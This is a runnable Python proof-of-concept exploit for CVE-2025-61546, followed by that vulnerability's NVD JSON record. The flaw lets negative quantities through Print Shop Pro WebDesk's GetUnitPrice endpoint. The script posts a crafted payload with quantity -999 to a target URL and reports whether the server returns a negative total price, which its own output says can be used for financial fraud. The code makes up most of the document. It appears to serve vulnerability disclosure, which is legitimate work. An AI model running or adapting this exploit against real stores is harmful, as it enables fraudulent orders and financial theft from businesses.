CVE-2025-61546

#!/usr/bin/env python3 """ CVE-2025-61546 PoC - Print Shop Pro WebDesk Negative Quantity Bypass This PoC demonstrates the business logic vulnerability in GetUnitPrice endpoint where negative quantity values can be used to create financial discrepancies. """ import requests import json import sys def exploit_negative_quantity(target_url, product_id, negative_qty): """ Exploit the negative quantity vulnerability in Print Shop Pro WebDesk Args: target_url: Base URL of the vulnerable application product_id: ID of the product to purchase negative_qty: Negative quantity to send (e.g., -999) Returns: dict: Response from the server """ endpoint = f"{target_url}/PSP/appNET/Store/CartV12.aspx/GetUnitPrice" # Construct the malicious payload with negative quantity payload = { "productId": product_id, "quantity": negative_qty, # Negative value to exploit "unitPrice": 100.00 # Normal unit price } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "X-Requested-With": "XMLHttpRequest" } print(f"[*] Target: {endpoint}") print(f"[*] Sending malicious request with quantity={negative_qty}") try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: data = response.json() if 'd' in data: result = data['d'] if isinstance(result, dict) and 'TotalPrice' in result: total_price = result['TotalPrice'] if total_price < 0: print(f"[!] VULNERABLE: Negative price calculated: {total_price}") print("[!] This can be used for financial fraud!") return {"vulnerable": True, "total_price": total_price} return {"vulnerable": False} except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return {"error": str(e)} if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-61546_poc.py <target_url> <product_id>") print("Example: python cve-2025-61546_poc.py http://vulnerable-server.com 12345") sys.exit(1) target = sys.argv[1] product = sys.argv[2] # Test with a negative quantity value result = exploit_negative_quantity(target, product, -999) if result.get('vulnerable'): print("\n[+] Vulnerability confirmed!") print(f"[+] Attacker can create order with total price: {result['total_price']}")

{"cve": {"id": "CVE-2025-61546", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.510", "lastModified": "2026-02-10T18:16:19.737", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an issue on the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69) that enables remote attacker to create financial discrepancies by purchasing items with a negative quantity. This vulnerability is possible due to reliance on client-side input validation controls."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:*", "matchCriteriaId": "88C72179-FF05-44F1-87A2-80179F38245D"}]}]}], "references": [{"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61546", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}